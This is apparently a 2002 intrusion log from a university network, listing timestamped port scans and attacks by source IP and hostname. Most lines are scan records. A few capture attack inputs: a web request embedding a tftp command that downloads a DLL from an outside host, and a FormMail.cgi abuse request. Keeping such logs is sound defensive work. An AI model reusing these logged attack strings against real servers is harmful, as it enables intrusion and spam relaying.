2002/10/28-12:18:56.66 193.252.171.71 (ABordeaux-103-1-2-71.abo.wanadoo.fr) scannet for ports 21
2002/10/28-12:50:27.34 211.184.106.1 () scannet for ports 80
2002/10/28-13:17:54.23 66.141.123.224 (ppp-66-141-123-224.dialup.eulstx.swbell.net) scannet for ports 80 139 445
2002/10/28-13:26:29.10 80.59.72.212 (212.Red-80-59-72.pooles.rima-tde.net) scannet for ports 139
2002/10/28-13:31:07.98 66.141.123.224 (ppp-66-141-123-224.dialup.eulstx.swbell.net) 1 heavy scan of net ports 139,445 til 14:35:00.38
2002/10/28-14:02:57.13 217.85.139.163 (pD9558BA3.dip.t-dialin.net) attack NT machine via smb, break in, set up ftp server.
2002/10/28-14:51:45.22 217.136.16.211 (211.16-136-217.adsl.skynet.be) scannet for ports 21
2002/10/28-16:36:57.47 195.175.112.40 (nwusr-8231.dial-in.ttnet.net.tr) 1. stupid anon ftp attack,including "RETR /dev/Apr 17 2002 tcp"
2002/10/28-16:36:57.47 195.175.112.40 (nwusr-8231.dial-in.ttnet.net.tr) 2. and use of cracked passwd from dummy passwd file
2002/10/28-18:28:31.37 217.208.70.68 (h68n2fls33o891.telia.com) scannet for ports 80
2002/10/28-18:42:50.09 80.138.252.72 (p508AFC48.dip.t-dialin.net) scannet for ports 445
2002/10/28-18:43:24.06 217.208.70.68 (h68n2fls33o891.telia.com) scannet for ports 80
2002/10/28-18:54:52.57 168.93.100.112 () scannet for ports 443
2002/10/28-21:14:14.49 24.208.183.228 (dhcp024-208-183-228.columbus.rr.com) scannet for ports 13 ports
2002/10/28-21:54:28.99 24.214.108.49 (user-24-214-108-49.knology.net) scannet for ports 445 80
2002/10/28-22:01:00.36 24.214.108.49 (user-24-214-108-49.knology.net) attack 132.235.4.22:445
2002/10/29-01:39:00.29 209.5.243.3 (wc1.mb.skyweb.ca) scannet for ports 80
2002/10/29-01:39:36.23 204.50.169.151 (204-50-169-151.mb.skyweb.ca) attack on 132.235.1.[89,90] ports 445,135 til 01:43:31.01
2002/10/29-01:39:37.30 204.50.169.151 (204-50-169-151.mb.skyweb.ca) scannet for ports 445 139
2002/10/29-01:45:15.21 80.138.220.69 (p508ADC45.dip.t-dialin.net) heavy attack on 132.235.1.90 ports 445,135 til 01:48:13.98
2002/10/29-01:46:08.38 218.104.200.74 () scannet for ports 8 ports
2002/10/29-04:41:26.20 210.58.19.193 (193.c19.ethome.net.tw) scannet for ports 80
2002/10/29-04:41:44.47 211.76.97.230 () scannet for ports 80
2002/10/29-04:42:12.30 211.76.97.229 () scannet for ports 80
2002/10/29-04:42:28.72 211.76.97.248 () scannet for ports 80
2002/10/29-06:43:48.51 61.199.200.219 (pc3.yoshikawa-unet.ocn.ne.jp) scannet for ports 1433
2002/10/29-07:54:36.12 193.96.193.222 () scannet for port 139
2002/10/29-07:55:59.59 203.147.55.174 () scannet for port 139
2002/10/29-07:57:00.12 200.171.41.209 (200-171-41-209.dsl.telesp.net.br) scannet for port 139
2002/10/29-08:23:44.53 66.110.140.153 (adsl-66.110.140-153.globetrotter.net) scannet for port 139
2002/10/29-08:40:35.59 61.11.34.113 () scannet for port 139
2002/10/29-09:10:57.22 216.7.34.191 (prosser2-191.bentonrea.com) scannet for port 139
2002/10/29-09:44:52.33 216.78.40.248 (host-216-78-40-248.ath.bellsouth.net) scannet for port 139
2002/10/29-10:11:51.24 200.163.52.217 (200-163-52-217-pvoce200.dial.telebrasilia.net.br) scannet for port 139
2002/10/29-10:11:56.14 80.9.107.185 (Mix-Strasbourg-209-4-185.abo.wanadoo.fr) scannet for port 139
2002/10/29-10:29:07.32 218.24.8.212 () scannet for port 139
2002/10/29-10:43:43.18 218.152.126.241 () scannet for port 139
2002/10/29-10:44:39.26 217.141.182.29 (host29-182.pool217141.interbusiness.it) scannet for port 139
2002/10/29-11:05:37.15 131.94.148.117 (stucffa.fiu.edu) scannet for port 445 139 80
2002/10/29-11:20:12.61 200.171.128.50 (200-171-128-50.dsl.telesp.net.br) scannet for port 139
2002/10/29-12:02:21.94 62.211.199.230 () scannet for port 139
2002/10/29-12:15:32.04 212.142.146.44 (eu146-44.clientes.euskaltel.es) scannet for port 139
2002/10/29-13:05:19.27 213.6.75.135 (A4b87.pppool.de) scannet for port 139
2002/10/29-13:06:26.07 213.96.230.26 (213-96-230-26.uc.nombres.ttd.es) scannet for port 139
2002/10/29-13:34:49.54 200.247.184.160 () scannet for port 139
2002/10/29-13:59:32.35 80.49.107.69 (pa69.zlote-lany.sdi.tpnet.pl) scannet for port 139
2002/10/29-14:07:49.69 211.162.174.2 () scannet for port 139
2002/10/29-14:40:19.46 210.54.34.12 (dsl34-12.world-net.co.nz) scannet for port 139
2002/10/29-14:44:29.42 211.126.206.178 (aa2000110314003.userreverse.dion.ne.jp) scannet for port 139
2002/10/29-15:21:45.08 80.200.109.81 (81.109-200-80.adsl.skynet.be) scannet for port 139
2002/10/29-15:23:17.99 204.120.137.5 (SEW3.sou.ashlandfn.org) scannet for port 139
2002/10/29-15:47:05.41 80.139.205.88 (p508BCD58.dip.t-dialin.net) scannet for port 139
2002/10/29-16:03:29.76 200.171.237.103 (200-171-237-103.customer.telesp.net.br) scannet for port 139
2002/10/29-16:05:27.16 213.99.137.182 (213-99-137-182.uc.nombres.ttd.es) scannet for port 139
2002/10/29-16:29:55.02 212.119.82.10 () scannet for port 139
2002/10/29-17:15:49.10 141.35.162.43 (pcphys.zoo.uni-jena.de) scannet for port 139
2002/10/29-17:26:09.62 80.246.67.251 () scannet for port 139
2002/10/29-18:01:28.16 129.44.18.112 (pool-129-44-18-112.alb.east.verizon.net) scannet for port 139
2002/10/29-18:01:34.12 148.208.144.61 () scannet for port 139
2002/10/29-18:33:05.51 67.40.18.33 () scannet for port 1433
2002/10/29-18:36:13.43 4.47.70.131 (evrtwa1-ar4-4-47-070-131.evrtwa1.dsl-verizon.net) scannet for port 80
2002/10/29-19:58:13.90 208.168.208.9 (orion.peganet.net) scannet for port 139
2002/10/29-19:58:17.44 61.107.140.52 () scannet for port 21
2002/10/29-21:09:34.44 134.39.173.55 () scannet for port 445 139
2002/10/29-21:10:03.07 203.77.122.254 (host254.20377122.gcn.net.tw) scannet for port 139
2002/10/29-23:13:46.20 65.106.187.230 (w230.z065106187.nyc-ny.dsl.cnc.net) scannet for port 80
2002/10/29-23:56:10.77 203.129.254.22 (STP-Pune POP,IN) attack 132.235.16.78:80 w/command: tftp%20-i%20132.132.64.166%20GET%20cool.dll%
2002/10/30-02:06:20.27 212.194.103.5 (lns05a-8-5.w.club-internet.fr) scannet for port 21
2002/10/30-02:36:57.02 213.143.76.4 (tm.213.143.76.4.dc.telemach.net) scannet for port 80
2002/10/30-03:38:03.54 67.8.117.14 (14-117.8-67.tampabay.rr.com) scannet for port 445 139 80
2002/10/30-04:15:37.43 151.99.239.101 (giotto.centro1.interbusiness.it) scannet for port 80
2002/10/30-05:59:55.49 134.39.173.55 (Center for Information Services,Bellevue WA,US) 1. attack 132.235.1.[89,90] ports 139,445
2002/10/30-05:59:55.49 134.39.173.55 (Center for Information Services,Bellevue WA,US) 2 til 2002/10/31-04:49:55.59
2002/10/30-08:36:35.02 24.102.110.100 (CPE014080217577.cpe.net.cable.rogers.com) scannet for ports 445
2002/10/30-08:37:12.94 62.141.73.120 () scannet for ports 139
2002/10/30-09:42:10.96 194.209.195.96 (top11-096.freenet.ch) scannet for ports 139
2002/10/30-09:44:50.59 65.40.197.208 (user208.net512.nj.sprint-hsd.net) 48 tries to conn to 132.235.1.7 : 5281 TCP
2002/10/30-09:57:29.25 12.158.5.94 () scannet for ports 139
2002/10/30-10:29:56.47 148.246.151.117 () scannet for ports 139
2002/10/30-10:42:46.76 61.191.104.119 () scannet for ports 139
2002/10/30-10:42:53.19 64.171.96.175 (adsl-64-171-96-175.dsl.sndg02.pacbell.net) scannet for ports 139
2002/10/30-10:48:13.93 195.241.224.117 (xs195-241-224-117.dial.tiscali.nl) scannet for ports 139
2002/10/30-11:20:12.50 200.206.243.13 (200-206-243-13.dsl.telesp.net.br) scannet for ports 139
2002/10/30-11:25:54.29 217.67.198.6 (telemobil.k.mcnet.pl) scannet for ports 139
2002/10/30-11:27:08.66 195.175.145.127 (nwusr-16766.dial-in.ttnet.net.tr) scannet for ports 139
2002/10/30-11:27:17.87 203.126.18.165 () scannet for ports 139
2002/10/30-11:35:34.69 211.201.189.24 () scannet for ports 139
2002/10/30-11:36:23.03 200.38.1.191 (red-corb1-200381-191.telnor.net) scannet for ports 139
2002/10/30-12:47:47.46 151.99.137.116 () scannet for ports 139
2002/10/30-12:59:53.18 148.243.43.35 (na-148-243-43-35.na.avantel.net.mx) scannet for ports 139
2002/10/30-12:59:58.53 211.57.160.114 () scannet for ports 139
2002/10/30-13:45:50.88 64.108.76.91 (adsl-64-108-76-91.dsl.lgnnmi.ameritech.net) scannet for ports 139
2002/10/30-13:58:49.23 210.105.133.164 () scannet for ports 139
2002/10/30-14:01:34.63 211.245.121.99 () scannet for ports 139
2002/10/30-14:19:04.88 64.170.90.178 (adsl-64-170-90-178.dsl.lsan03.pacbell.net) scannet for ports 80
2002/10/30-14:25:28.52 200.60.202.120 (client-200.60.202.120-speedy.net.pe) scannet for ports 139
2002/10/30-14:38:32.40 204.233.38.18 () scannet for ports 80 443
2002/10/30-14:58:52.94 200.207.127.231 (200-207-127-231.dsl.telesp.net.br) scannet for ports 139
2002/10/30-15:07:04.78 200.254.220.4 () scannet for ports 139
2002/10/30-15:07:11.55 218.159.80.57 () scannet for ports 139
2002/10/30-15:09:46.54 80.200.232.66 (66.232-200-80.adsl.skynet.be) scannet for ports 139
2002/10/30-15:18:19.17 200.151.155.225 (SHASTA155225.ig.com.br) scannet for ports 139
2002/10/30-15:53:35.02 200.188.182.167 (nas3-167.estaminas.com.br) scannet for ports 139
2002/10/30-18:34:20.60 149.225.102.32 (1Cust32.tnt3.hnr2.deu.da.uu.net) scannet for ports 80
2002/10/30-18:50:52.67 132.203.23.93 (ip-23-093.fsa.ulaval.ca) scannet for ports 80
2002/10/30-18:53:18.27 152.9.59.16 () scannet for ports 139 524 445
2002/10/30-19:57:27.25 196.40.79.5 () scannet for ports 139
2002/10/30-20:29:12.53 211.192.67.123 (Kookmin University,KR)
2002/10/30-20:29:24.74 211.192.67.123 () scannet for ports 445 139
2002/10/30-20:32:20.00 218.145.165.161 () scannet for ports 139
2002/10/30-20:52:21.86 12.222.5.210 (12-222-5-210.client.insightBB.com) scannet for ports 445
2002/10/30-23:40:27.45 211.172.112.2 () scannet for ports 80 443
2002/10/31-00:28:20.78 200.192.132.53 (mail.integrare.com) scannet for ports 80
2002/10/31-00:32:47.45 209.10.62.166 () scannet for ports 1433 80
2002/10/31-02:52:38.55 210.178.12.111 () scannet for ports 80
2002/10/31-04:42:05.36 24.214.18.95 (user-24-214-18-95.knology.net) 1. attack web server :GET /cgi/FormMail.cgi?recipient=nobody@cs.ohiou.edu&subject=http://ace.cs.oh
2002/10/31-04:42:05.36 24.214.18.95 (user-24-214-18-95.knology.net) 3. iou.edu/cgi/FormMail.cgi/&email=John@doe.com& =is
2002/10/31-04:42:05.36 24.214.18.95 (user-24-214-18-95.knology.net) 4. anybody out there?
2002/10/31-05:31:56.62 80.117.20.248 (host248-20.pool80117.interbusiness.it) scannet for ports 6112 1524 2002/10/31-08:25:24.28 210.249.20.194 (F020194.ppp.dion.ne.jp) scannet for port 139 2002/10/31-08:51:11.97 80.15.196.117 (AToulon-102-1-5-117.abo.wanadoo.fr) scannet for port 21 2002/10/31-09:03:29.35 80.15.196.117 (AToulon-102-1-5-117.abo.wanadoo.fr) scannet for port 21 2002/10/31-09:39:29.51 213.7.112.9 (B7009.pppool.de) scannet for port 139 2002/10/31-09:59:04.51 210.214.111.75 (dialpool-210-214-111-75.maa.sify.net) scannet for port 139 2002/10/31-10:33:36.73 217.185.120.166 (nrbg-d9b978a6.pool.mediaWays.net) scannet for port 139 2002/10/31-10:33:47.14 220.79.45.53 () scannet for port 139 2002/10/31-10:38:07.51 213.82.152.129 () scannet for port 139 2002/10/31-10:49:05.19 193.77.207.70 () scannet for port 139 2002/10/31-10:59:18.25 130.243.13.140 (pc61-409-25.Student.hig.se) scannet for port 80 1433 2002/10/31-11:17:24.39 130.243.13.140 (pc61-409-25.Student.hig.se) scannet for port 1433 80 2002/10/31-11:38:39.65 217.164.245.115 (s1b369.alshamil.net.ae) scannet for port 139 2002/10/31-11:39:43.91 63.20.89.209 (1Cust209.tnt53.ewr3.da.uu.net) scannet for port 139 2002/10/31-11:39:48.56 208.224.183.180 (ppp180-lk.zamnet.zm) scannet for port 139 2002/10/31-12:08:04.32 80.36.240.164 (164.Red-80-36-240.pooles.rima-tde.net) scannet for port 139 2002/10/31-12:08:10.06 216.201.71.207 () scannet for port 139 2002/10/31-12:42:19.76 64.173.108.187 (adsl-64-173-108-187.dsl.lsan03.pacbell.net) scannet for port 139 2002/10/31-13:01:40.22 67.84.168.121 (ool-4354a879.dyn.optonline.net) scannet for port 139 2002/10/31-13:16:59.34 161.132.189.12 () scannet for port 139 2002/10/31-13:21:18.86 211.191.52.206 () scannet for port 139 2002/10/31-14:01:22.36 208.177.157.114 (w114.z208177157.sjc-ca.dsl.cnc.net) scannet for port 21 2002/10/31-14:03:16.46 208.177.157.114 (w114.z208177157.sjc-ca.dsl.cnc.net) scannet for port 21 2002/10/31-14:11:46.95 200.168.140.123 
(200-168-140-123.dsl.telesp.net.br) scannet for port 139 2002/10/31-14:11:51.95 207.76.74.93 (a2p36-ct.megahits.net) scannet for port 139 2002/10/31-14:28:54.48 212.47.229.94 (dyn-212-47-229-94.ppp.tiscali.fr) scannet for port 139 2002/10/31-14:31:35.93 62.21.166.124 () scannet for port 139 2002/10/31-14:31:40.72 148.245.60.137 (maquina137.orbis.org.mx) scannet for port 139 2002/10/31-15:44:58.12 146.187.21.172 () scannet for port 139 2002/10/31-17:01:34.07 64.81.103.37 (dsl081-103-037.den1.dsl.speakeasy.net) scannet for port 139 2002/10/31-17:24:17.27 151.39.67.70 () scannet for port 80 2002/10/31-17:27:21.55 211.217.143.125 () scannet for port 139 2002/10/31-17:27:50.75 151.39.67.70 () scannet for port 80 2002/10/31-17:50:03.03 213.114.1.25 (c-190172d5.045-18-6c756e2.cust.bredbandsbolaget.se) scannet for port 80 2002/10/31-18:08:13.85 213.114.1.25 (c-190172d5.045-18-6c756e2.cust.bredbandsbolaget.se) scannet for port 80 2002/10/31-18:09:02.37 148.233.230.65 (gpo-herdez-d32-0208-0012.uninet.net.mx) scannet for port 139 2002/10/31-18:51:21.03 61.78.6.125 () scannet for port 139 2002/10/31-18:55:17.11 209.142.8.17 (ppp-209-142-8-17.17.softcom.net) scannet for port 139 2002/10/31-18:55:22.95 61.189.216.146 () scannet for port 139 2002/10/31-19:48:12.12 66.136.111.179 () scannet for port 139 2002/10/31-20:04:22.07 155.239.194.113 (sil53-01-p113.nt.saix.net) scannet for port 139 2002/10/31-20:26:56.44 209.246.183.193 (dialup-209.246.183.193.Dial1.Atlanta1.Level3.net) scannet for port 139 2002/10/31-20:32:49.62 218.103.67.231 (ipvpn146231.netvigator.com) scannet for port 1433 2002/10/31-20:37:08.23 218.103.67.231 (ipvpn146231.netvigator.com) scannet for port 1433